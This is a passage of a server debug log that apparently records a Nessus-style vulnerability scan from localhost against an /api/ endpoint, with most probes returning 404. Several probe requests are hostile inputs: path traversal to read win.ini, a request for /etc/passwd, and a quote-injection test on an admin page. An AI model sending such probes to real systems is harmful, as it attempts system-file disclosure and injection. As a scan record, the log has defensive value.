::1, resCode: 200 +2022-10-31T22:39:27.782Z debug: [1667255967781, duration: 0] GET:/api/Help.action, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.787Z debug: [1667255967786, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.798Z debug: [1667255967794, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.846Z debug: [1667255967844, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.850Z debug: [1667255967849, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.854Z debug: [1667255967853, duration: 0] GET:/api/mod_gzip_status, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.858Z debug: [1667255967857, duration: 1] GET:/api/uddipublic/default.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.865Z debug: [1667255967864, duration: 1] GET:/api/uddi/default.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.907Z debug: [1667255967906, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.911Z debug: [1667255967909, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.914Z debug: [1667255967913, duration: 1] GET:/api/Explorer/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.918Z debug: [1667255967917, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.946Z debug: [1667255967944, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.962Z debug: [1667255967961, duration: 0] GET:/api/sabin/SiteAdmin.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.963Z debug: [1667255967960, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:27.971Z debug: [1667255967970, duration: 1] GET:/api/admin/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.981Z debug: [1667255967980, duration: 1] GET:/api/admin/LocalIndex.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.989Z debug: [1667255967988, duration: 1] GET:/api/scmadmin/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:27.998Z debug: [1667255967997, duration: 0] GET:/api/scmadmin/LocalIndex.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.008Z debug: [1667255968003, duration: 4] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.016Z debug: [1667255968016, duration: 0] GET:/api/reporter/client.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.058Z debug: [1667255968055, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.059Z debug: [1667255968057, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.066Z debug: [1667255968065, duration: 1] GET:/api/index.exp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.067Z debug: [1667255968064, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.103Z debug: [1667255968100, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.104Z debug: [1667255968101, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.109Z debug: [1667255968109, duration: 0] GET:/api/core/orionSplashScreen.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.114Z debug: [1667255968112, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.141Z debug: [1667255968139, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.152Z debug: [1667255968151, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.156Z debug: [1667255968155, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.166Z debug: [1667255968165, duration: 1] GET:/api/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.189Z debug: [1667255968187, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.209Z debug: [1667255968208, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.213Z debug: [1667255968212, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.223Z debug: [1667255968222, duration: 0] POST:/api/servlet/GetProductVersion, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.263Z debug: [1667255968261, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.267Z debug: [1667255968265, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.273Z debug: [1667255968271, duration: 1] GET:/api/PassTrixMain.cc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.303Z debug: [1667255968301, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.311Z debug: [1667255968310, duration: 1] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.322Z debug: [1667255968321, duration: 1] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.323Z debug: [1667255968320, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.332Z debug: [1667255968331, duration: 0] GET:/api/netflow/html/aboutus.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.366Z debug: [1667255968364, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.369Z debug: [1667255968367, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.384Z debug: [1667255968382, duration: 1] GET:/api/LoginPage.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.418Z debug: [1667255968417, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.423Z debug: [1667255968421, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.425Z debug: [1667255968424, duration: 1] GET:/api/login.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.434Z debug: [1667255968433, duration: 0] GET:/api/help/introduction/release-notes.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.436Z debug: [1667255968435, duration: 0] GET:/api/event/index.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.476Z debug: [1667255968474, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.477Z debug: [1667255968474, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.483Z debug: [1667255968482, duration: 1] GET:/api/NCMContainer.cc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.489Z debug: [1667255968489, duration: 0] GET:/api/configurations.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.526Z debug: [1667255968524, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.529Z debug: [1667255968528, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.533Z debug: [1667255968532, duration: 1] GET:/api/index.do, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.565Z debug: [1667255968563, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.575Z debug: [1667255968574, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.623Z debug: [1667255968620, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.644Z debug: [1667255968642, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.648Z debug: [1667255968647, duration: 1] GET:/api/smconf.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.651Z debug: [1667255968651, duration: 0] GET:/api/smadmr5.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.654Z debug: [1667255968653, duration: 0] GET:/api/smency.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.655Z debug: [1667255968655, duration: 0] GET:/api/smftypes.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.658Z debug: [1667255968657, duration: 1] GET:/api/smsmvlog.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.660Z debug: [1667255968659, duration: 1] GET:/api/smhelp.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.663Z debug: [1667255968662, duration: 0] GET:/api/smmsg.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.664Z debug: [1667255968664, duration: 0] GET:/api/smtime.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.668Z debug: [1667255968667, duration: 1] GET:/api/smquar.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.673Z debug: [1667255968672, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.688Z debug: [1667255968687, duration: 1] GET:/api/stcenter.nsf, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.696Z debug: [1667255968696, duration: 0] GET:/api/Sametime/buildinfo.txt, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.704Z debug: [1667255968703, duration: 0] GET:/api/Sametime/domino/html/sametime/buildinfoST75CF1.txt, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.717Z debug: [1667255968716, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.724Z debug: [1667255968723, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.743Z debug: [1667255968742, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.753Z debug: [1667255968751, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.766Z debug: [1667255968764, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.773Z debug: [1667255968772, duration: 0] GET:/api/HNAP1/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.804Z debug: [1667255968802, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.811Z debug: [1667255968810, duration: 1] GET:/api/mve/help/en/inventory/am_about.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.849Z debug: [1667255968847, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.857Z debug: [1667255968856, duration: 0] POST:/api/jsonrpc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.891Z debug: [1667255968889, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.898Z debug: [1667255968897, duration: 0] POST:/api/server/service/smsConfigServiceHttpInvoker, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.940Z debug: [1667255968938, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:28.947Z debug: [1667255968946, duration: 1] GET:/api/api/v1.0/environment, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:28.954Z debug: [1667255968953, duration: 1] GET:/api/vsapres/web20/core/login.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.008Z debug: [1667255969005, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.018Z debug: [1667255969017, duration: 1] GET:/api/mainui/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.051Z debug: [1667255969049, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.059Z debug: [1667255969059, duration: 0] GET:/api/assets/js/conf/global_config.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.090Z debug: [1667255969088, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.097Z debug: [1667255969096, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.126Z debug: [1667255969124, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.133Z debug: [1667255969132, duration: 1] GET:/api/WEB-INF/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.170Z debug: [1667255969168, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.178Z debug: [1667255969177, duration: 1] GET:/api/invoker/EJBInvokerServlet, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.181Z debug: [1667255969180, duration: 1] GET:/api/invoker/JMXInvokerServlet, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.220Z debug: [1667255969219, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.229Z debug: [1667255969228, duration: 0] GET:/api/web-console/ServerInfo.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.260Z debug: [1667255969258, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.290Z debug: [1667255969288, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.297Z debug: [1667255969296, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.346Z debug: [1667255969344, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.353Z debug: [1667255969352, duration: 1] GET:/api/NASApp/nessus/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.383Z debug: [1667255969382, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.392Z debug: [1667255969391, duration: 1] GET:/api/NASApp/nessus/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.424Z debug: [1667255969423, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.432Z debug: [1667255969431, duration: 1] GET:/api/home.seam, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.462Z debug: [1667255969461, duration: 0] GET:/api/interscan/cgi-bin/FtpSave.dll?I'm%20Here, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.483Z debug: [1667255969481, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.529Z debug: [1667255969528, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.538Z debug: [1667255969537, duration: 0] GET:/api/status.php3, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.549Z debug: [1667255969548, duration: 1] GET:/api/imp/status.php3, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.559Z debug: [1667255969558, duration: 1] GET:/api/horde/imp/status.php3, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.612Z debug: [1667255969610, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.620Z debug: [1667255969620, duration: 0] GET:/api/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.628Z debug: [1667255969627, duration: 1] GET:/api/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=nessus', reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.665Z debug: [1667255969663, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.672Z debug: [1667255969671, duration: 1] GET:/api/iisprotect/admin/GlobalAdmin.asp?V_FirstTab=GlobalSetting, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.739Z debug: [1667255969737, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.749Z debug: [1667255969748, duration: 0] GET:/api/iissamples/issamples/fastq.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.760Z debug: [1667255969759, duration: 1] GET:/api/iissamples/issamples/query.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.769Z debug: [1667255969768, duration: 0] GET:/api/iissamples/exair/search/search.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.777Z debug: [1667255969776, duration: 0] GET:/api/iissamples/exair/search/query.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.789Z debug: [1667255969784, duration: 2] GET:/api/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.794Z debug: [1667255969793, duration: 0] GET:/api/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.801Z debug: [1667255969800, duration: 1] GET:/api/scripts/samples/search/author.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.810Z debug: [1667255969808, duration: 1] GET:/api/scripts/samples/search/filesize.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.817Z debug: [1667255969816, duration: 0] GET:/api/scripts/samples/search/filetime.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.825Z debug: [1667255969824, duration: 1] GET:/api/scripts/samples/search/queryhit.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.834Z debug: [1667255969833, duration: 0] GET:/api/scripts/samples/search/simple.idq, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.842Z debug: [1667255969841, duration: 1] GET:/api/iissamples/exair/howitworks/codebrws.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.851Z debug: [1667255969850, duration: 0] GET:/api/iissamples/issamples/query.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.919Z debug: [1667255969917, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.928Z debug: [1667255969926, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:29.931Z debug: [1667255969930, duration: 1] GET:/api/pQnHNdvQ.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:29.980Z debug: [1667255969978, duration: 1] GET:/api/NULL.ida, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.009Z debug: [1667255970006, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.016Z debug: [1667255970015, duration: 1] GET:/api/niet1181081142, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.025Z debug: [1667255970024, duration: 1] GET:/api/niet466186260., reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.032Z debug: [1667255970031, duration: 1] GET:/api/niet1693581702.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.039Z debug: [1667255970039, duration: 0] GET:/api/niet933438239.aspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.046Z debug: [1667255970045, duration: 0] GET:/api/niet312678052.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.052Z debug: [1667255970052, duration: 0] GET:/api/niet1456643410.htm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.059Z debug: [1667255970059, duration: 0] GET:/api/niet433259471.shtm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.066Z debug: [1667255970065, duration: 0] GET:/api/niet1334758867.shtml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.073Z debug: [1667255970072, duration: 1] GET:/api/niet1449687695.jsp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.079Z debug: [1667255970078, duration: 1] GET:/api/niet162314493.jspx, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.087Z debug: [1667255970086, duration: 0] GET:/api/niet612887132.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.095Z debug: [1667255970094, duration: 1] GET:/api/niet762188297.php3, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.104Z debug: [1667255970101, duration: 3] GET:/api/niet1517616836.php4, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.111Z debug: [1667255970110, duration: 1] GET:/api/niet1527353381.php5, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.119Z debug: [1667255970118, duration: 0] GET:/api/niet868326257.php6, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.127Z debug: [1667255970125, duration: 1] GET:/api/niet668102383.cfm, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.509Z debug: [1667255970506, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.518Z debug: [1667255970517, duration: 1] GET:/api/cgi-bin/com5.pl, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.567Z debug: [1667255970565, duration: 1] GET:/api/iissamples/sdk/asp/docs/codebrws.asp, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.591Z debug: [1667255970589, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.598Z debug: [1667255970597, duration: 1] GET:/api/iisadmpwd/aexp.htr, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.605Z debug: [1667255970605, duration: 0] GET:/api/iisadmpwd/aexp2.htr, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.613Z debug: [1667255970612, duration: 0] GET:/api/iisadmpwd/aexp2b.htr, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.620Z debug: [1667255970619, duration: 0] GET:/api/iisadmpwd/aexp3.htr, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.627Z debug: [1667255970626, duration: 0] GET:/api/iisadmpwd/aexp4.htr, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.634Z debug: [1667255970634, duration: 0] GET:/api/iisadmpwd/aexp4b.htr, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.697Z debug: [1667255970696, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.706Z debug: [1667255970705, duration: 0] GET:/api/igsponsor, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.738Z debug: [1667255970736, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.744Z debug: [1667255970744, duration: 0] GET:/api/query.idq?CiTemplate=../../../../../winnt/win.ini, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.752Z debug: [1667255970751, duration: 1] GET:/api/query.idq?CiTemplate=../../../../../winnt/win.ini%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.785Z debug: [1667255970783, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.792Z debug: [1667255970791, duration: 0] GET:/api/mail/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.845Z debug: [1667255970843, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.852Z debug: [1667255970851, duration: 1] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.886Z debug: [1667255970884, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.893Z debug: [1667255970892, duration: 0] GET:/api/builtin/index.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.933Z debug: [1667255970931, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.941Z debug: [1667255970939, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:30.944Z debug: [1667255970942, duration: 1] GET:/api/tsp/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.950Z debug: [1667255970949, duration: 1] GET:/api/ap/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:30.958Z debug: [1667255970957, duration: 0] GET:/api/ssp/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.003Z debug: [1667255971001, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.011Z debug: [1667255971010, duration: 0] GET:/api/login, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.052Z debug: [1667255971051, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.060Z debug: [1667255971059, duration: 1] GET:/api/ngp/version, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.088Z debug: [1667255971086, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.095Z debug: [1667255971094, duration: 1] GET:/api/i18n/adminconsole_en_us.json, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.124Z debug: [1667255971123, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.132Z debug: [1667255971131, duration: 0] GET:/api/oc/lib-prod/tsm/TSM-login.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.162Z debug: [1667255971160, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.169Z debug: [1667255971169, duration: 0] GET:/api/rcladmin/js/art_i18n/nls/art_i18n.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.202Z debug: [1667255971200, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.210Z debug: [1667255971209, duration: 1] GET:/api/rdweb/login/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.245Z debug: [1667255971242, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.252Z debug: [1667255971251, duration: 0] GET:/api/ibmmq/console/login.html, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.260Z debug: [1667255971259, duration: 0] GET:/api/ibmmq/console/nls/en/strings.json, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.296Z debug: [1667255971294, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.305Z debug: [1667255971304, duration: 0] GET:/api/jts/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.340Z debug: [1667255971338, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.349Z debug: [1667255971348, duration: 0] GET:/api/dp/login.xml, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.386Z debug: [1667255971384, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.394Z debug: [1667255971392, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.425Z debug: [1667255971423, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.431Z debug: [1667255971430, duration: 1] GET:/api/shared/userlogin.php, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.464Z debug: [1667255971463, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.471Z debug: [1667255971470, duration: 0] GET:/api/trc, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.503Z debug: [1667255971501, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.509Z debug: [1667255971508, duration: 1] GET:/api/~nobody/etc/passwd, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.563Z debug: [1667255971561, duration: 2] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.572Z debug: [1667255971570, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.605Z debug: [1667255971603, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.612Z debug: [1667255971611, duration: 0] GET:/api/redfish/v1/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.648Z debug: [1667255971646, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.656Z debug: [1667255971655, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.702Z debug: [1667255971701, duration: 1] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.712Z debug: [1667255971711, duration: 1] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.720Z debug: [1667255971719, duration: 0] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.726Z debug: [1667255971725, duration: 1] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.733Z debug: [1667255971732, duration: 0] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.741Z debug: [1667255971740, duration: 0] GET:/api/js/hpsum/hpsum-version.js, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.792Z debug: [1667255971789, duration: 3] GET:/api/, reqOrigin: ::1, resCode: 200 +2022-10-31T22:39:31.799Z debug: [1667255971799, duration: 0] GET:/api/SiteScope/, reqOrigin: ::1, resCode: 404 +2022-10-31T22:39:31.839Z debug: [1667255971837, duration: 2] GET:/api/, reqOrigin: ::1, 